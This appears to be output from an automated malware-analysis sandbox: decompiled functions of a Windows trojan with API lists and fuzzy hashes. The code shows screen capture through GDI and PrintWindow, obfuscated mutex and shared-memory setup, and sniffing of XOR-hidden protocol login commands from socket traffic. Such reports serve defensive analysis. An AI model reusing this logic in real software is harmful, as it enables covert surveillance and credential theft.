    					if(_t182 == 0) {
    						goto L66;
    					}
    					_t183 = LoadLibraryA("gdi32.dll");
    					_v16 = _t183;
    					_t262 = GetProcAddress(_t183, "CreateDCW");
    					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
    					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
    					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
    					_v56 = GetProcAddress(_v16, "SelectObject");
    					_v76 = GetProcAddress(_v16, "BitBlt");
    					_v84 = GetProcAddress(_v16, "DeleteObject");
    					_t191 = GetProcAddress(_v16, "DeleteDC");
    					_v68 = _t191;
    					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
    						goto L66;
    					} else {
    						_push(0);
    						_push( &_v104);
    						_push( &_v116);
    						_v104 = 1;
    						_v100 = 0;
    						_v96 = 0;
    						_v92 = 0;
    						if(_v24() != 0) {
    							goto L66;
    						}
    						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
    						_v24 = _t268;
    						if(_t268 == 0) {
    							L65:
    							_v80(_v116);
    							goto L66;
    						}
    						_t197 = _v12(_t268);
    						_v36 = _t197;
    						if(_t197 == 0) {
    							L64:
    							_v68(_v24);
    							goto L65;
    						}
    						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
    						_v12 = _t199;
    						if(_t199 == 0) {
    							L24:
    							_t263 = 0;
    							goto L26;
    						} else {
    							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
    								_v12 = 0;
    							}
    							if(_v12 != 0) {
    								_t263 = _a12;
    								L26:
    								if(_t263 == 0) {
    									_t200 = _v28(_t268, 8);
    									_t269 = _t200;
    									_a12 = _v28(_v24, 0xa);
    								} else {
    									_t269 = _t263 & 0x0000ffff;
    									_a12 = _t269;
    								}
    								_t202 = _v44(_v24, _t269, _a12);
    								_v44 = _t202;
    								if(_t202 == 0) {
    									L63:
    									_v68(_v36);
    									goto L64;
    								} else {
    									_t204 = _v56(_v36, _t202);
    									_v112 = _t204;
    									if(_t204 == 0) {
    										L62:
    										_v84(_v44);
    										goto L63;
    									}
    									_t206 = 0;
    									_t248 = 0;
    									if(_t263 != 0) {
    										_t260 = (_t263 & 0x0000ffff) >> 1;
    										_t206 =  <  ? 0 : _v52.x - _t260;
    										_t248 =  <  ? 0 : _v52.y - _t260;
    										_t81 =  &_v52;
    										 *_t81 = _v52.x - _t206;
    										if( *_t81 < 0) {
    											_v52.x = 0;
    										}
    										_t84 =  &(_v52.y);
    										 *_t84 = _v52.y - _t248;
    										if( *_t84 < 0) {
    											_v52.y = 0;
    										}
    									}
    									_push(0x40cc0020);
    									_push(_t248);
    									_push(_t206);
    									_push(_v24);
    									_push(_a12);
    									_push(_t269);
    									_push(0);
    									_push(0);
    									_push(_v36);
    									if(_v76() == 0) {
    										L61:
    										_v56(_v36, _v112);
    										goto L62;
    									} else {
    										if(_v12 != 0) {
    											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
    											_t239 = _v52.y - _v172.yHotspot;
    											_t240 =  <  ? 0 : _t239;
    											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
    										}
    										_push( &_v12);
    										_push(0);
    										_push(_v44);
    										_v12 = 0;
    										if(_v88() != 0 || _v12 == 0) {
    											goto L61;
    										} else {
    											_push( &_v28);
    											_push( &_a12);
    											_a12 = 0;
    											_v28 = 0;
    											if(_v40() != 0) {
    												L60:
    												_v72(_v12);
    												goto L61;
    											}
    											_t215 = _v28;
    											if(_v28 == 0 || _a12 == 0) {
    												goto L60;
    											} else {
    												_t264 = E00411CCE(_t215);
    												_v40 = _t264;
    												if(_t264 == 0) {
    													goto L60;
    												}
    												_push(_t264);
    												_push(_v28);
    												_push(_a12);
    												if(_v64() != 0) {
    													L52:
    													E00411CFE(_v40);
    													if(_a12 == 0) {
    														_push( &_v32);
    														_push(1);
    														_push(0);
    														if(_v120() == 0 && _v32 != 0) {
    															_v152 = 0;
    															if(_a8 > 0) {
    																E00411D3A( &_v148, 0x40495c, 0x10);
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
    																_v152 = _v152 + 1;
    															}
    															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
    															_t224 = _v32;
    															if(_t223 == 0) {
    																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
    															} else {
    																 *((intOrPtr*)( *_t224 + 8))(_t224);
    																_v32 = 0;
    															}
    														}
    													}
    													goto L60;
    												}
    												_t272 = 0;
    												if(_a12 <= 0) {
    													goto L52;
    												}
    												_t265 = _t264 + 0x30;
    												while(lstrcmpiW(_a4,  *_t265) != 0) {
    													_t272 = _t272 + 1;
    													_t265 =  &(_t265[0x13]);
    													if(_t272 < _a12) {
    														continue;
    													}
    													goto L52;
    												}
    												E00411D3A( &_v188, _t272 * 0x4c + _v40, 0x10);
    												_a12 = 0;
    												goto L52;
    											}
    										}
    									}
    								}
    							}
    							goto L24;
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A6FE
    • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A70F
    • GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A71C
    • GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A729
    • GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A736
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A743
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A750
    • GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A75D
    • LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A7A5
    • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A7B0
    • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A7C2
    • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A7CD
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A7D9
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A7E6
    • GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A7F3
    • GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A800
    • GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A80D
    • GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A81A
    • GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0041A827
    • LoadImageW.USER32 ref: 0041A8CB
    • GetIconInfo.USER32(00000000,?), ref: 0041A8E0
    • GetCursorPos.USER32(?), ref: 0041A8EE
    • DrawIcon.USER32 ref: 0041A9BF
    • lstrcmpiW.KERNEL32(?,-00000030), ref: 0041AA40
    • FreeLibrary.KERNEL32(00000000), ref: 0041AB57
    • FreeLibrary.KERNEL32(?), ref: 0041AB61
    • FreeLibrary.KERNEL32(00000000), ref: 0041AB6B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
    • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
    • API String ID: 1554524784-1167942225
    • Opcode ID: dd1da0fdf710baf697d9d825b3dd4f5479666ec498d6b001143b817059854be0
    • Instruction ID: 6cd427191155a3525e249610e73412454ef9c8de38e11afcfb302e3069d65519
    • Opcode Fuzzy Hash: dd1da0fdf710baf697d9d825b3dd4f5479666ec498d6b001143b817059854be0
    • Instruction Fuzzy Hash: 7DE1E4B1D01259ABCF209FE5CD84AEEBBBAFF48340F14442BE605B2250D7789991CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E004066DB(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
    				char _v9;
    				signed int _v10;
    				int _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				void* _v68;
    				signed int _v72;
    				int _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				int _v92;
    				struct HDC__* _v96;
    				struct HWND__* _v100;
    				void _v104;
    				intOrPtr _v140;
    				intOrPtr _v156;
    				struct tagWINDOWINFO _v164;
    				signed int _t128;
    				signed int _t135;
    				void* _t140;
    				void* _t146;
    				signed int _t164;
    				intOrPtr _t191;
    				long _t192;
    				intOrPtr _t195;
    				long _t196;
    				long _t210;
    				long _t211;
    				long _t212;
    				long _t213;
    				signed int _t214;
    				signed int _t215;
    				RECT* _t216;
    				struct HDC__* _t217;
    				struct HDC__* _t221;
    
    				_t214 = __edx;
    				_t216 = __eax;
    				_t128 = E0040B7B4(_a8) & 0x0000ffff;
    				_v16 = _t128;
    				if((_t128 & 0x00000001) == 0) {
    					if(_t128 == 0) {
    						_v16 = 2;
    						_t128 = _v16;
    					}
    					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
    						_v16 = _t128 & 0x0000fffd | 0x00000008;
    					}
    					_v24 = 0;
    					_v20 = 0;
    					_v28 = 0;
    					_v32 = 0;
    					_v164.cbSize = 0x3c;
    					if(GetWindowInfo(_a8,  &_v164) != 0) {
    						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
    						_v10 = _t215;
    						if(_t215 != 0) {
    							_t212 = _t216->top;
    							_t195 = _v156;
    							if(_t195 < _t212) {
    								_v20 = _t195 - _t212;
    							}
    							_t213 = _t216->left;
    							_t196 = _v164.rcWindow.left;
    							if(_t196 < _t213) {
    								_v24 = _t196 - _t213;
    							}
    						}
    						_t135 = _v16 & 0x00000002;
    						_v72 = _t135;
    						if(_t135 == 0) {
    							_a15 = _t215;
    						} else {
    							if((_v164.dwStyle & 0x20000000) == 0) {
    								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
    								if(_a15 != 0) {
    									_t210 = _t216->top;
    									_t191 = _v140;
    									if(_t191 < _t210) {
    										_v32 = _t191 - _t210;
    									}
    									_t211 = _t216->left;
    									_t192 = _v164.rcClient.left;
    									if(_t192 < _t211) {
    										_v28 = _t192 - _t211;
    									}
    								}
    							} else {
    								_a15 = 0;
    							}
    						}
    						if(_v10 != 0 || _a15 != 0) {
    							_t217 = GetDC(0);
    							if(_t217 == 0) {
    								goto L8;
    							}
    							_t221 = CreateCompatibleDC(_t217);
    							ReleaseDC(0, _t217);
    							if(_t221 == 0) {
    								goto L8;
    							}
    							_t218 = _a4;
    							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
    							_v68 = _t140;
    							if(_t140 != 0) {
    								_v9 = 1;
    								if(_v72 == 0) {
    									if((_v16 & 0x00000004) == 0) {
    										if((_v16 & 0x00000008) == 0) {
    											L56:
    											SelectObject(_t221, _v68);
    											DeleteDC(_t221);
    											return _v9;
    										}
    										if(_v24 != 0 || _v20 != 0) {
    											SetViewportOrgEx(_t221, _v24, _v20, 0);
    										}
    										_t146 = E004065F9(_t218,  &_v64, 0);
    										__imp__PrintWindow(_a8, _t221, 0);
    										if(_t146 != 0) {
    											L55:
    											E004065F9(_t218,  &_v64, 1);
    										} else {
    											_v9 = 0;
    										}
    										goto L56;
    									}
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E004065F9(_t218,  &_v64, 0);
    									DefWindowProcW(_a8, 0x317, _t221, 0xe);
    									goto L55;
    								}
    								_v100 = _a8;
    								_v96 = _t221;
    								_v84 = _v48.right - _v48.left;
    								_v76 = 1;
    								_v80 = _v48.bottom - _v48.top;
    								_v92 = 0;
    								_v88 = 0;
    								TlsSetValue( *0x42291c,  &_v104);
    								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
    									_v16 = SaveDC(_t221);
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E004065F9(_a4,  &_v64, 0);
    									_v104 = 0;
    									SendMessageW(_a8, 0x85, 1, 0);
    									if(_v104 == 0) {
    										DefWindowProcW(_a8, 0x317, _t221, 2);
    									}
    									E004065F9(_a4,  &_v64, 1);
    									RestoreDC(_t221, _v16);
    								}
    								if(_a15 != 1) {
    									L49:
    									TlsSetValue( *0x42291c, 0);
    									goto L56;
    								} else {
    									if(_v28 != 0) {
    										L41:
    										_a15 = 1;
    										L42:
    										_v16 = SaveDC(_t221);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										E004065F9(_a4,  &_v48, 0);
    										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
    										asm("sbb eax, eax");
    										_v76 =  ~_t164 + 1;
    										RestoreDC(_t221, _v16);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										_v104 = 0;
    										SendMessageW(_a8, 0xf, 0, 0);
    										if(_v104 == 0) {
    											DefWindowProcW(_a8, 0x317, _t221, 4);
    										}
    										E004065F9(_a4,  &_v48, 1);
    										goto L49;
    									}
    									_a15 = 0;
    									if(_v32 == 0) {
    										goto L42;
    									}
    									goto L41;
    								}
    							}
    							DeleteDC(_t221);
    							goto L8;
    						} else {
    							goto L1;
    						}
    					}
    					L8:
    					return 0;
    				}
    				L1:
    				return 1;
    			}

    APIs
      • Part of subcall function 0040B7B4: GetClassNameW.USER32 ref: 0040B7CF
    • GetWindowInfo.USER32 ref: 00406747
    • SelectObject.GDI32(00000000,?), ref: 00406A16
    • DeleteDC.GDI32(00000000), ref: 00406A1D
    • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00406A45
    • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00406A5B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
    • String ID: <
    • API String ID: 3458064076-4251816714
    • Opcode ID: b0dfebc72f8d82f1e4a9835183512c2eca0c563e7424100c2c09cd974f571730
    • Instruction ID: 0efd9288e116f9c89f11bb4f806ed385f23750aa86c90ddb74374ac724712f1d
    • Opcode Fuzzy Hash: b0dfebc72f8d82f1e4a9835183512c2eca0c563e7424100c2c09cd974f571730
    • Instruction Fuzzy Hash: D0C18D71D01249AFDF119FA4DD84AEEBBB9AF05304F01803AF906B72A0D7388A54DF65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00411969(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
    				char _v536;
    				char _v652;
    				char _v664;
    				char _v696;
    				char _v700;
    				char _v701;
    				char _v708;
    				void* __esi;
    				char* _t35;
    				void* _t40;
    				char* _t43;
    				intOrPtr _t44;
    				void* _t47;
    				void* _t54;
    				void* _t56;
    				intOrPtr _t57;
    				signed int _t58;
    				signed int _t60;
    				void* _t61;
    				signed int* _t71;
    				intOrPtr _t73;
    				signed int _t75;
    				signed char _t76;
    				intOrPtr _t79;
    				signed int _t80;
    				intOrPtr _t83;
    				signed int* _t84;
    				intOrPtr _t85;
    				void* _t87;
    				char* _t92;
    				void* _t93;
    				intOrPtr* _t94;
    
    				_t80 = __edx;
    				_t87 = __eax;
    				_t71 = __ecx;
    				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
    					L51:
    					_t35 = 0;
    					__eflags = 0;
    				} else {
    					if(__eax <= 6) {
    						L24:
    						__eflags = _t87 - 1;
    						if(_t87 <= 1) {
    							goto L51;
    						} else {
    							EnterCriticalSection(0x422c2c);
    							_t83 = E00411861(_a4);
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags =  *((intOrPtr*)(_t83 + 4));
    								if( *((intOrPtr*)(_t83 + 4)) == 0) {
    									L48:
    									_push(0);
    									goto L49;
    								} else {
    									__eflags =  *((intOrPtr*)(_t83 + 8));
    									if( *((intOrPtr*)(_t83 + 8)) == 0) {
    										goto L48;
    									} else {
    										__eflags = _t87 - 3;
    										if(_t87 < 3) {
    											L33:
    											__eflags = _t87 - 4;
    											if(_t87 >= 4) {
    												_t75 =  *_t71 ^ 0x01030809;
    												__eflags = _t75 - 0x4453515d;
    												if(_t75 == 0x4453515d) {
    													goto L37;
    												} else {
    													__eflags = _t75 - 0x55424d4f;
    													if(_t75 == 0x55424d4f) {
    														goto L37;
    													} else {
    														__eflags = _t75 - 0x57504959;
    														if(_t75 != 0x57504959) {
    															__eflags = _t75 - 0x55425c5a;
    															if(_t75 == 0x55425c5a) {
    																L40:
    																_t76 = 0x65;
    																_push(0x15);
    																goto L41;
    															} else {
    																__eflags = _t75 - 0x55504145;
    																if(_t75 == 0x55504145) {
    																	goto L40;
    																}
    															}
    														} else {
    															goto L37;
    														}
    													}
    												}
    											}
    										} else {
    											_t58 =  *_t71;
    											__eflags = _t58 - 0x43;
    											if(_t58 == 0x43) {
    												L31:
    												__eflags = _t71[0] - 0x57;
    												if(_t71[0] != 0x57) {
    													goto L33;
    												} else {
    													__eflags = _t71[0] - 0x44;
    													if(_t71[0] == 0x44) {
    														L37:
    														_t76 = 0x64;
    														_push(0x14);
    														L41:
    														_pop(_t40);
    														E00419897(_t40,  &_v696);
    														_t43 =  &_v652;
    														_v700 = 0x80;
    														__imp__#5(_a4, _t43,  &_v700);
    														__eflags = _t43;
    														if(_t43 == 0) {
    															_t78 =  &_v664;
    															_t44 = E004151A8( &_v664);
    															__eflags = _t44;
    															if(_t44 == 0) {
    																__eflags = _t76 - 0x65;
    																if(_t76 == 0x65) {
    																	L46:
    																	E0041515F( &_v664, _t78,  &_v536);
    																	_t47 = 0x13;
    																	E00419897(_t47,  &_v696);
    																	_push( &_v536);
    																	_push( *((intOrPtr*)(_t83 + 8)));
    																	_push( *((intOrPtr*)(_t83 + 4)));
    																	E00407CCA(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
    																} else {
    																	__eflags = _t76 - 0x64;
    																	if(_t76 == 0x64) {
    																		_t92 =  &_v696;
    																		_t54 = 0x16;
    																		E00419897(_t54, _t92);
    																		_push( *((intOrPtr*)(_t83 + 4)));
    																		_t80 = _t80 | 0xffffffff;
    																		_t56 = 9;
    																		_t78 = _t92;
    																		_t57 = E0041290E(_t56, _t92, _t80);
    																		__eflags = _t57;
    																		if(_t57 != 0) {
    																			goto L46;
    																		}
    																	}
    																}
    															}
    														}
    														_push(0);
    														L49:
    														E00411900(_t83);
    													} else {
    														goto L33;
    													}
    												}
    											} else {
    												__eflags = _t58 - 0x50;
    												if(_t58 != 0x50) {
    													goto L33;
    												} else {
    													goto L31;
    												}
    											}
    										}
    									}
    								}
    							}
    							_t73 = 0;
    							goto L23;
    						}
    					} else {
    						_t60 =  *__ecx ^ 0x01030809;
    						if(_t60 == 0x53465b5c || _t60 == 0x52504959) {
    							if(_t71[1] != 0x20) {
    								goto L24;
    							} else {
    								_t61 = 0;
    								_t93 = _t87 + 0xfffffffb;
    								_t84 =  &(_t71[1]);
    								if(_t93 == 0) {
    									goto L51;
    								} else {
    									while(1) {
    										_t79 =  *((intOrPtr*)(_t61 + _t84));
    										if(_t79 == 0xd || _t79 == 0xa) {
    											break;
    										}
    										if(_t79 < 0x20) {
    											goto L51;
    										} else {
    											_t61 = _t61 + 1;
    											if(_t61 < _t93) {
    												continue;
    											} else {
    												break;
    											}
    										}
    										goto L52;
    									}
    									if(_t61 == 0 || _t61 == _t93) {
    										goto L51;
    									} else {
    										_t85 = E00411F3E(_t61, 0xfde9, _t84);
    										if(_t85 == 0) {
    											goto L51;
    										} else {
    											_v701 = 0;
    											EnterCriticalSection(0x422c2c);
    											_t94 = E00411861(_a4);
    											if(_t94 != 0) {
    												L18:
    												__eflags =  *_t71 - 0x55;
    												_v701 = 1;
    												if( *_t71 != 0x55) {
    													E00411CFE( *((intOrPtr*)(_t94 + 8)));
    													 *((intOrPtr*)(_t94 + 8)) = _t85;
    												} else {
    													E00411900(_t94, 1);
    													 *((intOrPtr*)(_t94 + 4)) = _t85;
    												}
    												 *_t94 = _a4;
    											} else {
    												_t94 = E0041189A(_a4);
    												if(_t94 != 0) {
    													goto L18;
    												} else {
    													E00411CFE(_t85);
    												}
    											}
    											_t73 = _v701;
    											L23:
    											LeaveCriticalSection(0x422c2c);
    											_t35 = _t73;
    										}
    									}
    								}
    							}
    						} else {
    							goto L24;
    						}
    					}
    				}
    				L52:
    				return _t35;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00422C2C,0000FDE9,?), ref: 00411A1E
    • LeaveCriticalSection.KERNEL32(00422C2C,?,000000FF), ref: 00411A79
    • EnterCriticalSection.KERNEL32(00422C2C), ref: 00411A94
    • #5.WS2_32 ref: 00411B41
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Enter$Leave
    • String ID: $D$EAPU$OMBU$U$W$YIPR$YIPW$Z\BU$\[FS$]QSD
    • API String ID: 2801635615-1153246223
    • Opcode ID: 070a577a1e4237049f55bc1f498b1bce3b1e777d4035d60b6598a80317653ccf
    • Instruction ID: 89fc5902602c07329043c7ca2f1b6e6373b8230471df5728d0ee075ea96daf00
    • Opcode Fuzzy Hash: 070a577a1e4237049f55bc1f498b1bce3b1e777d4035d60b6598a80317653ccf
    • Instruction Fuzzy Hash: BD514431A08751AADF309B26CC817EB7B945F02758F04451BEBA4972B1E72CADC1C38E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B81B(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
    				char _v5;
    				struct HDC__* _v12;
    				char _v16;
    				short _v124;
    				void* _v134;
    				char _v612;
    				char _v1087;
    				char _v1372;
    				void* _t60;
    				long _t62;
    				void* _t66;
    				void* _t71;
    				void* _t75;
    				void* _t79;
    				void* _t80;
    				struct HDC__* _t82;
    				int _t85;
    				void* _t87;
    				signed char _t90;
    				void* _t92;
    				void* _t107;
    				struct HDC__* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t120;
    				void** _t124;
    
    				_t124 = __esi;
    				_t120 = __edx;
    				E00411DB1(_t60, __esi, 0, 0x18c);
    				_t62 = TlsAlloc();
    				__esi[1] = _t62;
    				if(_t62 != 0xffffffff) {
    					E0041C9FB(0x84889911,  &_v124, 0);
    					_t66 = RegisterWindowMessageW( &_v124);
    					__esi[2] = _t66;
    					__eflags = _t66;
    					if(_t66 == 0) {
    						goto L1;
    					}
    					E0041C9FB(0x84889912,  &_v124, 1);
    					_t71 = CreateEventW(0x423b98, 1, 0,  &_v124);
    					__esi[3] = _t71;
    					__eflags = _t71;
    					if(_t71 == 0) {
    						goto L1;
    					}
    					E0041C9FB(0x18782822,  &_v124, 1);
    					_t75 = CreateMutexW(0x423b98, 0,  &_v124);
    					__esi[5] = _t75;
    					__eflags = _t75;
    					if(_t75 == 0) {
    						goto L1;
    					}
    					E0041C9FB(0x9878a222,  &_v124, 1);
    					_t79 = CreateFileMappingW(0, 0x423b98, 4, 0, 0x3d09128,  &_v124);
    					 *__esi = _t79;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						goto L1;
    					}
    					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
    					__eflags = _t80;
    					if(_t80 == 0) {
    						goto L1;
    					}
    					__esi[4] = _t80;
    					__esi[6] = _t80 + 0x128;
    					_v5 = 0;
    					_t82 = GetDC(0);
    					_v12 = _t82;
    					__eflags = _t82;
    					if(_t82 == 0) {
    						L22:
    						return _v5;
    					}
    					__esi[9] = 0;
    					__esi[0xa] = 0;
    					__esi[0xb] = GetDeviceCaps(_t82, 8);
    					_t85 = GetDeviceCaps(_v12, 0xa);
    					_t21 =  &(_t124[0xb]); // 0x0
    					_t118 =  *_t21;
    					__esi[0xc] = _t85;
    					__eflags = CreateCompatibleBitmap(_v12,  *_t21, _t85);
    					if(__eflags == 0) {
    						_t87 = 0;
    						__eflags = 0;
    					} else {
    						_t24 =  &(_t124[8]); // 0x422938
    						_t87 = E004182AC(_t118, _t120, __eflags, _v12,  &_v16, _t24, 0, 0, _t86);
    					}
    					_t124[7] = _t87;
    					ReleaseDC(0, _v12);
    					__eflags = _t124[7];
    					if(_t124[7] != 0) {
    						_t119 = _v16;
    						_t90 =  *(_v16 + 0xe) >> 3;
    						_t124[0xe] = _t90;
    						_t33 =  &(_t124[0xb]); // 0x0
    						_t92 = (_t90 & 0x000000ff) *  *_t33;
    						_t124[0xd] = _t92;
    						__eflags = _t92 & 0x00000003;
    						if((_t92 & 0x00000003) != 0) {
    							_t92 = (_t92 & 0xfffffffc) + 4;
    							__eflags = _t92;
    						}
    						_t124[0xd] = _t92;
    						E00411CFE(_t119);
    						__eflags = _a4 - 1;
    						_v5 = 1;
    						if(_a4 != 1) {
    							goto L22;
    						}
    						_v5 = 0;
    						E0041CCD2( &_v1372);
    						E0041CCFF(_t119,  &_v612);
    						_t43 =  &(_t124[0xf]); // 0x422954
    						E00411D3A(_t43, 0x423dd8, 0x10);
    						_t124[0x13] = _v134;
    						_t47 =  &(_t124[0x14]); // 0x422968
    						E00411D3A(_t47,  &_v1087, 0x102);
    						E0041C9FB(0x1898b122,  &_v124, 1);
    						_t107 = CreateMutexW(0x423b98, 0,  &_v124);
    						_t124[0x58] = _t107;
    						__eflags = _t107;
    						if(_t107 == 0) {
    							goto L1;
    						}
    						_t108 = GetDC(0);
    						_a4 = _t108;
    						__eflags = _t108;
    						if(_t108 != 0) {
    							_t109 = CreateCompatibleDC(_t108);
    							_t124[0x55] = _t109;
    							__eflags = _t109;
    							if(_t109 != 0) {
    								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
    								_t124[0x57] = _t111;
    								__eflags = _t111;
    								if(_t111 != 0) {
    									_t55 =  &(_t124[0x55]); // 0x0
    									_t112 = SelectObject( *_t55, _t111);
    									_t124[0x56] = _t112;
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_v5 = 1;
    									}
    								}
    							}
    							ReleaseDC(0, _a4);
    						}
    					}
    					goto L22;
    				}
    				L1:
    				return 0;
    			}

    APIs
    • TlsAlloc.KERNEL32(00422918,00000000,0000018C,00000000,00000000), ref: 0040B834
    • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040B85C
    • CreateEventW.KERNEL32(00423B98,00000001,00000000,?,84889912,?,00000001), ref: 0040B886
    • CreateMutexW.KERNEL32(00423B98,00000000,?,18782822,?,00000001), ref: 0040B8A9
    • CreateFileMappingW.KERNEL32(00000000,00423B98,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040B8D4
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040B8EA
    • GetDC.USER32(00000000), ref: 0040B907
    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040B927
    • GetDeviceCaps.GDI32(?,0000000A), ref: 0040B931
    • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040B944
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
    • String ID:
    • API String ID: 3765073151-0
    • Opcode ID: 1920a14c2de5aee5aa6ae3e32525a63148e3ce777c176758046c3397dcb2788e
    • Instruction ID: ea774b8f74f765c220f51346cb63b8329dac9040d0a26255887830c7b82d441a
    • Opcode Fuzzy Hash: 1920a14c2de5aee5aa6ae3e32525a63148e3ce777c176758046c3397dcb2788e
    • Instruction Fuzzy Hash: 267142B1944644AFDB20AFB08C84EEA7BECEB04304F50493EF542E26A1D77999858F58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BF5F(void _a4) {
    				long _v12;
    				void* _v16;
    				void* _v20;
    				char _v22;
    				short _v24;
    				char* _v32;
    				char* _v36;
    				intOrPtr _v40;
    				void* _v44;
    				char _v56;
    				char _v64;
    				char _v548;
    				char _v552;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t53;
    				void* _t56;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    				void* _t94;
    				void* _t97;
    				char* _t99;
    				intOrPtr* _t106;
    				void* _t109;
    				intOrPtr* _t110;
    				void* _t114;
    
    				_t106 = _a4;
    				if(E00416767( &_v36,  *((intOrPtr*)(_t106 + 4))) == 0) {
    					L25:
